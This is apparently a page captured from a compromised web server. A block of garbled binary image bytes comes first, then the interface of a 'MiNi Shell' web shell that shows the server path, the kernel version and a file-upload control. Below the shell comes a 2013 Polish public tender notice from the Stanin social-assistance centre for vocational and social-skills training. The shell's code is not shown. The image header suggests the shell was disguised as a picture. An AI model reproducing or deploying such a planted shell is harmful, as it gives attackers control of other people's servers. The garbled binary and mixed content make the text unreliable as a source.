JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130509/69971-N-2013.html

<p class="kh_header"><b>Stanin: Przeprowadzenie szkoleń/kursów zawodowych dla 18 beneficjentów projektu systemowego Efektywna Pomoc społeczna w gminie Stanin.</b><br>
<b>Numer ogłoszenia: 69971 - 2013; data zamieszczenia: 09.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , Stanin 62, 21-422 Stanin, woj. lubelskie, tel. 25 798 11 02, faks 25 798 11 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gops-stanin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminny Ośrodek Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń/kursów zawodowych dla 18 beneficjentów projektu systemowego Efektywna Pomoc społeczna w gminie Stanin..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przeprowadzenie szkolenia Trening kompetencji i umiejętności społecznych, dla 17 uczestników projektu systemowego Efektywna pomoc społeczna w gminie Stanin, powinien obejmować warsztaty składające się z nauki umiejętności komunikacji werbalnej i niewerbalnej, nabycie umiejętności efektywnego słuchania i wypowiadania się. Trening przyczyni się do wypracowania postawy asertywnej oraz poprawi jakość komunikowania się uczestników z otoczeniem. Liczba godzin dydaktycznych - 45-minutowych zajęć grupowych: 40 godz.
2.Przeprowadzenie szkolenia Trening pracy, dla 17 uczestników projektu systemowego Efektywna pomoc społeczna w gminie Stanin, powinien obejmować warsztaty składające się z nauki umiejętności komunikacji interpersonalnej w miejscu pracy, analiza mocnych i słabych stron oraz wspieranie siebie w poszukiwaniu pracy. Uczestnicy zapoznają się z technikami poszukiwania pracy oraz radzeniem sobie z zaplanowaniem i przestrzeganiem planu poszukiwania pracy. Nabędą umiejętności budowania i redagowania dokumentacji aplikacyjnej oraz odpowiedzi na pytania podczas rozmowy kwalifikacyjnej. Liczba godzin dydaktycznych 45-minutowych zajęć grupowych: 24 godz.Zajęcia będą odbywać się w dni robocze od poniedziałku do piątku.
Zajęcia będą rozpoczynać się nie wcześniej, niż o godz. 9:00, kończyć się nie później niż o godz. 17:00.
Po każdych dwóch godzinach dydaktycznych nastąpi 10 minutowa przerwa oraz 20 minutowa przerwa obiadowa nie wliczane do łącznego czasu zajęć.
3.Przeprowadzenie szkolenia,kursów zawodowych dla 17 uczestników projektu systemowego Efektywna pomoc społeczna w gminie Stanin:
Sprzedawca z obsługą kasy fiskalnej dla 9 uczestników projektu systemowego w minimalnym wymiarze 100 godzin; Cel szkolenia:Nabycie umiejętności profesjonalnej obsługi klienta oraz pracy z kasą fiskalną i systemami kasowo-komputerowymi.
Program ramowy: umiejętności nawiązania relacji handlowych, profesjonalna obsługa klienta, prawne aspekty sprzedaży, gospodarka magazynowa, obsługa klienta - techniki sprzedaży, obsługa kas fiskalnych, maszyn liczących, kart płatniczych,  sprzedaż z użyciem kas fiskalnych, raportowanie i obsługa manualna kas, zasady archiwizacji dokumentów księgowych, urządzenia towarzyszące, wybrane elementy reklamy i marketingu, elementy prawne, towaroznawstwo,  znaki pieniężne. Dokumentacja i ewidencja sprzedaży, zagadnienia a minimum sanitarnego, BHP, organizacja czasu pracy.
Księgowość komputerowa z elementami fakturowania dla 4 uczestników projektu systemowego w minimalnym wymiarze 100 godzin, 
Cel szkolenia: nabycie wiedzy oraz praktycznych umiejętności do pracy w księgowości oraz prowadzenia rozliczeń własnej działalności gospodarczej w zakresie Podatkowej księgi przychodów i rozchodów oraz Księgi handlowej z wykorzystaniem programów komputerowych.
Program szkolenia: ewidencjonowanie zdarzeń gospodarczych oraz ich dokumentowanie w podatkowej księdze przychodów i rozchodów i w księdze handlowej, stosowania zasad otwierania, prowadzenia i zamykania ksiąg rachunkowych, identyfikacji poszczególnych podatków oraz ustalania podstaw prawnych opodatkowania danym podatkiem, identyfikacji podstaw prawnych z zakresu księgowości, obliczania należnych kwot podatków z wykorzystaniem obowiązujących stawek jak też ulg i zwolnień podatkowych, sporządzania deklaracji podatkowych, pism i rozliczeń w tym zakresie, ewidencjonowania rozrachunków związanych z podatkami,  kontrolowania dokonanych operacji w zakresie spraw podatkowych,  prowadzenia szczegółowej ewidencji księgowej poszczególnych rozrachunków, roszczeń spornych i rozliczeń, prowadzenia ewidencji rozliczanych kosztów rodzajowych i kosztów działalności, wyliczania wynagrodzenie za pracę, rozliczania składek ZUS, posługiwania się programem Płatnik, sporządzanie faktur , not księgowych i not korygujących, sprawdzanie poprawności i korygowanie faktur, wprowadzanie faktur do systemu informatycznego oraz kontrola obiegu dokumentacji handlowej, przygotowywanie raportów, sporządzanie bieżącej wewnętrznej dokumentacji,   sporządzania poszczególnych elementów sprawozdania finansowego - bilansu, rachunku zysków i strat i in. dotyczących podmiotu gospodarczego, wykorzystania techniki komputerowej w rachunkowości i rozliczeniach firmy.
Kucharz małej gastronomii dla 3 uczestników projektu systemowego, w minimalnym wymiarze 100 godz.Celem szkolenia jest przygotowanie uczestnika z zakresu wiedzy teoretycznej i praktycznej niezbędnej do wykonywania zawodu kucharza małej gastronomii.
Program szkolenia: podstawowe surowce, półprodukty i gotowe wyroby w zależności od pochodzenia i wartości odżywczej,  warunki przechowywania i wartości odżywcze surowców i półproduktów oraz gotowych potraw małej gastronomii,    techniki sporządzania potraw małej gastronomii w tym wypiekanie ciast, przygotowywanie deserów, przystrajanie gotowych ciast, tortów,  narzędzia, naczynia, maszyny i urządzenia stosowane w produkcji gastronomicznej,  planowanie posiłków i układanie prostego menu, zasady BHP, sporządzanie kalkulacji potraw i napojów, konserwowanie maszyn i urządzeń, podawanie obróbce wstępnej i cieplnej surowców odpowiednimi narzędziami, maszynami i urządzeniami, sporządzanie wyrobów gastronomicznych według określonych receptur i technologii, zarówno w zakładzie rzemieślniczym jak i w dużym zakładzie produkcyjnym.
Operator koparko - ładowarki  dla 1 uczestnika projektu systemowego w minimalnym wymiarze 176 godzin.Program kursu powinien zawierać bloki tematyczne zgodne z Centrum Szkolenia Operatorów Maszyn Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego z zakresu:
użytkowania eksploatacyjnego,
dokumentacji technicznej,
bezpieczeństwa i higieny pracy,
podstaw elektrotechniki,
silników spalinowych,
elementów hydrauliki,
budowy koparko-ładowarek,
technologii robót,
zajęć praktycznych.
Program kursu musi obejmować 176 godz. szkoleniowych podzielonych na część teoretyczną oraz indywidualną część praktyczną. Realizacja kursu powinna gwarantować uczestnikom solidne i profesjonalne przygotowanie teoretyczno-praktyczne Wykonawca powinien prowadzić kurs w sposób uzgodniony z Zamawiającym, tj. wg uzgodnionego harmonogramu i jest zobowiązany do zgłaszania Zamawiającemu wszelkich zmian w harmonogramie.
Zajęcia teoretyczne powinny odbywać się na terenie województwa lubelskiego. Sala szkoleniowa do prowadzenia zajęć teoretycznych musi być wyposażona w odpowiednią liczbę miejsc i stolików dla co najmniej 10 osób wraz z zapleczem sanitarnym. Sala musi być wyposażona w tablicę klasyczną lub flipchart, sprzęt audiowizualny. 
Miejsce odbywania zajęć praktycznych z odpowiednią liczbą maszyn do praktycznej nauki zawodu o stanie technicznym zapewniającym odpowiedni poziom kursu. Zamawiający prosi o szczegółowy opis wyposażenia używanego podczas zajęć praktycznych z uwzględnieniem liczby i typu maszyn oraz dokładnym adresem i opisem miejsca realizacji zajęć praktycznych. Kurs powinien zakończyć się państwowym egzaminem przed Komisją Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego.
Liczba osób biorących udział w poszczególnym szkoleniu zawodowym może ulec zmianie.
Wykonawca przedstawia cenę brutto za szkolenie,kurs dla 1 uczestnika.
Wykonawca otrzyma wynagrodzenie za faktycznie przeszkolonych uczestników.
4.Przeprowadzenie kursu pierwsza pomoc przedmedyczna dla  18 uczestników projektu systemowego Efektywna pomoc społeczna w gminie Stanin.Wymiar szkolenia obejmuje 8 godzin edukacyjnych tj. po 45 minut.Tematyka szkolenia musi zawierać następujące minimum programowe:
poznanie schematu udzielenia pomocy ofiarom wypadku drogowego, 
zdobycie umiejętności prowadzenia resuscytacji postępowania w zakrztuszeniu oraz we wstrząsie,
zasady resuscytacji krążeniowo - oddechowej,
pomoc w urazach w tym tamowanie krwotoków,  bandażownictwo -  opatrywanie ran oraz unieruchamianie złamań,
Postępowanie w nagłych przypadkach między innymi padaczka, zawał serca, udar mózgu, reakcja uczuleniowa.Informacje dodatkowe:
Na grupę szkoleniową  wymagany jest 1 trener prowadzący, posiadający doświadczenie w pracy potwierdzone przeprowadzonym co najmniej 1 szkoleniem z wyżej wymienionej tematyki. Zajęcia odbywać się będą   w formie zajęć teoretycznych oraz praktycznego pokazu i ćwiczeń praktycznych na fantomach oraz innym sprzęcie szkoleniowym. Zleceniobiorca zapewni odpowiedni sprzęt do zajęć w postaci fantomów i urządzeń resuscytacyjnych/  bandaży
5.Przeprowadzenie szkolenia trening budowania poprawnych relacji rodzinnych dla 18 uczestników projektu oraz przeprowadzenie diagnozy integracji sensorycznej u około 20 dzieci uczestników projektu oraz treningu zastępowania agresji. Tematyka szkolenia musi zawierać następujące minimum programowe:
1.Trening budowania poprawnych relacji rodzinnych  w wymiarze 48 godzin dla 18 uczestników w tym:
trening integracji emocjonalnej (poznanie swoich emocji, możliwości, ograniczeń) 16godz.;
trening komunikacji partnerskiej poprawa relacji partnerskiej w zakresie komunikacji, rozwiązywania problemów powstałych wskutek nieprawidłowej komunikacji, niezrozumienia potrzeb drugiej osoby, wspólnego rozwiązywania codziennych problemów- 16 godz.;
trening kompetencji rodzicielskich  poznanie technik i metod wychowania dzieci, porozumiewania się z najbliższymi, poprawa relacji z dzieckiem oraz wzmocnienie poczucia bycia dobrym rodzicem - 16 godz.
2.Przeprowadzenie diagnozy integracji sensorycznej u około 20 dzieci uczestników projektu oraz treningu zastępowania agresji w łącznym wymiarze 40 godzin -2 h/dziecko.
Integracja sensoryczna ma na celu stymulowanie układu nerwowego, aby dać dziecku możliwość właściwej pracy, czyli prawidłowego odbierania, przetwarzania i reagowania na bodźce płynące ze środowiska i naszego ciała. Terapeuta w obecności rodzica przeprowadzi wywiad szczegółowy na temat rozwoju dziecka, przebytych chorób, urazów. Na podstawie kwestionariusza sensomotorycznego i stosownych testów sporządzona zostanie karta diagnostyczna dla każdego dziecka opisująca wynik badania i zawierająca  informację jak stymulować rozwój dziecka, gdzie w razie potrzeby zwrócić się o pomoc.Trening zastępowania agresji ma na celu korygowanie agresywnych zachowań u dzieci i młodzieży.
Szczegóły zamówienia:
1 Wykonawca powinien posiadać zgodę na realizację poszczególnych modułów szkoleniowych i kursów w przypadku gdy pozwolenia takie są wymagane przepisami prawa regulującymi poszczególne zakresy tematyczne. 
2 Program i czas trwania szkolenia lub kursu musi być zgodny z obowiązującymi w tym zakresie przepisami prawa. Kurs zawodowy, szkolenie powinien kończyć się egzaminem końcowym, po którym uczestnicy szkolenia otrzymają zaświadczenie , certyfikat potwierdzający przyuczenie do zawodu oraz zaświadczenie potwierdzające posiadanie kwalifikacji zawodowych z wyszczególnieniem umiejętności i wiadomości nabytych w trakcie realizacji poszczególnych jednostek szkoleniowych; 
3 Ilość godzin szkolenia, kursu przypadających na każdego uczestnika szkolenia zgodna z wytycznymi do realizacji poszczególnych kursów co do zasady: dla treningu kompetencji i umiejętności społecznych  40 godzin zajęć grupowych; dla treningu pracy 24 godzin zajęć grupowych;, minimalna ilość godzin dla kursów zawodowych 100 godzin, w tym 60 godz. zajęć praktycznych, 40 godz. zajęć teoretycznych, w przypadku kursu na operatora koparko-ładowarki obowiązująca minimalna liczba godzin wynosi 176; I Pomoc Przedmedyczna 8 godzin grupowych w tym zajęć teoretycznych i praktycznych) ,Trening budowania poprawnych relacji rodzinnych  w wymiarze 48 godzin -45-minutowych dla 18 uczestników projektu; przeprowadzenie diagnozy integracji sensorycznej u około 20 dzieci uczestników projektu oraz treningu zastępowania agresji w łącznym wymiarze około 40 godzin -45-minutowych, 2 h/dziecko.
4 Program szkolenia oferowany przez Wykonawcę przedstawiony w ofercie powinien zawierać co najmniej następujące elementy: nazwa i zakres szkolenia, czas trwania i sposób organizacji szkolenia,  cele szkolenia, plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar z uwzględnieniem części teoretycznej i części praktycznej, niezbędne środki i materiały dydaktyczne, sposób sprawdzania efektów szkolenia wzór ankiety i zaświadczenia o ukończonym szkoleniu. 
5 Wykonawca obejmie uczestników ubezpieczeniem NW od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniami oraz w drodze do i z miejsca szkolenia.
6 Wykonawca poniesie koszty związane z badaniami lekarskim potwierdzającymi, że kandydaci mogą wykonywać poszczególne zawody - dla 17 uczestników szkoleń. 
7 Szkolenie powinno być przeprowadzone w oparciu o właściwe przepisy. Godzina szkolenia teoretycznego liczy 45 minut a szkolenia praktycznego liczy 60 minut. 
8 Szkolenie teoretyczne i praktyczne może odbywać się w dni robocze, od poniedziałku do piątku dopuszcza się prowadzenie zajęć praktycznych oraz teoretycznych w soboty. 
9 Czas trwania szkolenia nie może przekroczyć 10 godzin dziennie. 
10 Zajęcia prowadzone muszą być za pomocą omówienia zagadnień pod nadzorem wykładowców z kompetencjami do prowadzenia warsztatów i ćwiczeń w przedmiotowym zakresie wskazanych przez Wykonawcę w ofercie. 
11 Część praktyczna musi opierać się na samodzielnym wykonywaniu ćwiczeń przez uczestników szkolenia, przy stałym udziale wykładowców z kometencjami do prowadzenia danego szkolenia. 
12 Wykonawca przekaże uczestnikom materiały szkoleniowe: długopis, skrypt zajęć  zawierający tematy omawiane na zajęciach  oraz 1 kpl. dla Zamawiającego, autorski program szkolenia,  wskazówki, porady.
13 Wykonawca opracuje całość dokumentacji związanej z realizacją projektu zgodnie z wytycznymi obowiązującymi przy realizacji projektów w ramach Programu Operacyjnego Kapitał Ludzki dzienniki zajęć, konspekty zajęć, listy obecności, pokwitowanie odbioru cateringu, materiałów szkoleniowych, ankiety ewaluacyjne, które zostaną wypełnione przez uczestników na pierwszych i na ostatnich zajęciach,  ankieta oceniająca szkolenie, raport poszkoleniowy, a następnie przekaże Zamawiającemu.
14 Miejsce szkolenia. 
Szkolenie  trening kompetencji i umiejętności społecznych , trening pracy, pierwsza pomoc przedmedyczna, trening budowania poprawnych relacji rodzinnych odbyć się powinno w miejscowości na terenie Gminy Stanin. Szkolenia,kursy zawodowe powinny odbyć się  na terenie województwa Lubelskiego. W przypadku organizacji szkoleń zawodowych w odległości przekraczającej 15 km od miejscowości Stanin Wykonawca zapewni uczestnikom zwrot kosztów dojazdu na szkolenia.
15 Sala szkoleniowa o pojemności min. 20 osób, dla szkoleń,kursów zawodowych minimum 10 osób, sala z pełnym wyposażeniem nagłośnienie, krzesła dla uczestników, stolik i krzesło dla prelegenta, ekran, projektor multimedialny, laptop, flipchart + blok papierowy, flamastry. Sala wraz ze sprawnym sprzętem i jego obsługą techniczną musi być dostępna w danym terminie min. 1 godz. przed planowaną godziną rozpoczęcia szkolenia. 
16 Wykonawca podczas każdych zajęć grupowych i teoretycznych zapewni każdemu uczestnikowi gorący obiad dwudaniowy składający się z zupy, drugiego dania mięsnego o łącznej wadze 350g.  i surówki  oraz poczęstunek składający się z wody mineralnej, ciastek, kawy, mleczka, herbaty, cukru. Wykonawca musi zapewnić wydanie posiłku jednocześnie dla wszystkich uczestników danego szkolenia i zapewni obsługę pozwalającą na szybkie i sprawne wydanie posiłków.
17 Wykonawca wystawi uczestnikom szkolenia  zaświadczenia, certyfikaty o ukończeniu szkolenia zawierające informacje o jego tematyce oraz wymiarze godzin oraz zdobytych uprawnieniach.  Ponadto Wykonawca zobowiązany jest do umieszczenia na zaświadczeniach o ukończeniu szkolenia poniższej informacji: Szkolenie w ramach projektu systemowego współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego POKL, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałania 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej oraz ologowania zaświadczeń, list, materiałów dydaktycznych symbolami: logo UE z podpisem Unia Europejska, logo EFS, PO KL.
18 Wykonawca przeprowadzi ewaluację na początku i na końcu szkolenia - dokona oceny szkolenia oraz trenerów za pomocą ankiet ewaluacyjnych,
19  Zamawiający zastrzega sobie prawo dokonywania kontroli realizacji zamówienia,
20 Termin realizacji szkoleń liczony od dnia zawarcia umowy do: 
trening kompetencji i umiejętności społecznych 30.06.2013r.
trening pracy 30.09.2013r.
szkolenia/kursy zawodowe  30.09.2013r.
I pomoc przedmedyczna 30.09.2013r.
trening budowania poprawnych relacji rodzinnych oraz trening zastępowania agresji 31.10.2013r.


Kod przedmiotu zamówienia według Wspólnego Słownika Zamówień CPV 
80.50.00.00-9   Usługi szkoleniowe
Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy usługi szkoleniowej zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualnego  odpisu z   właściwego   rejestru   albo   aktualnego  zaświadczenia   
o   wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże się spełnieniem tego warunku, jeżeli należycie wykonał w ostatnich 3 latach przed upływem składania ofert lub jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej 3 usług szkoleniowych, podczas których przeszkolonych było co najmniej 10 osób. Potencjalny wykonawca potwierdzić musi wiedzę i doświadczenie odpowiednimi referencjami. Usługi szkoleniowe wskazane przez Wykonawcę odpowiadać powinny swym charakterem zakresom poszczególnych szkoleń/kursów; rozwój kompetencji społecznych,  realizacja kursów zawodowych kucharza, sprzedawcy z obsługą kasy fiskalnej,   księgowość, operator koparko-ładowarki, treningu pracy,  pierwszej pomocy przedmedycznej, treningu budowania poprawnych relacji rodzinnych i treningu zastępowania agresji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymogów dotyczących spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże się spełnieniem tego warunku, jeżeli dysponuje kadrą dydaktyczną, która składa się z minimum dwóch osób prowadzących szkolenia (trenerów, instruktorów), które posiadają wykształcenie wyższe (co najmniej drugiego stopnia - magisterskie) oraz przeprowadziły co najmniej 3 usługi szkoleniowe o tematyce zgodnej z przedmiotem zamówienia w danej części postępowania oraz  wykaże się  specjalistą ds. kursów zawodowych. W przypadku  specjalisty ds. kursów zawodowych powinni posiadać kwalifikacje zawodowe - zgodnie z właściwymi przepisami prawa.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymogów dotyczących spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
